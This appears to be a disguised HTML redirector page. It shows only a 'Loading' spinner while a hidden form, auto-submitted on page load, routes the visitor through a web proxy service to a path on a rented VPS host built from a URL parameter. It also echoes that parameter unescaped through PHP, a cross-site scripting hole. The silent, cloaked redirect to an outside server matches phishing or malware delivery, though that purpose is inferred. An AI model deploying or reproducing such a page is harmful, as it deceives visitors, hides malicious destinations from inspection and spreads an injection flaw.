<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loading ... </title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 70vh;
            margin: 0;
        }

        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #3498db;
            border-radius: 50%;
            width: 40px;
            height: 40px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="spinner"></div>


<form id="myForm" action="https://www.proxymesh.com/web/index.php" method="post" style="margin-bottom:0;display:none">
							<input id="url" name="url" value="https://dev-cdn360.pantheonsite.io/js/<?php echo $_GET['u']; ?>" type="text" style="width:400px;" autocomplete="off" placeholder="https://www.whatsmyip.org/">
							<input name="proxy" value="usisp">
							<input type="submit" value="Go"><br>							
						</form>
						
						

<script>

function get(name){
   if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
      return decodeURIComponent(name[1]);
}

document.getElementById("url").value = "https://vmi1544998.contaboserver.net/" + get('u'); 

    document.addEventListener("DOMContentLoaded", function () {
        var form = document.getElementById("myForm");

            form.submit();
       

    });
</script>

</body>
</html>
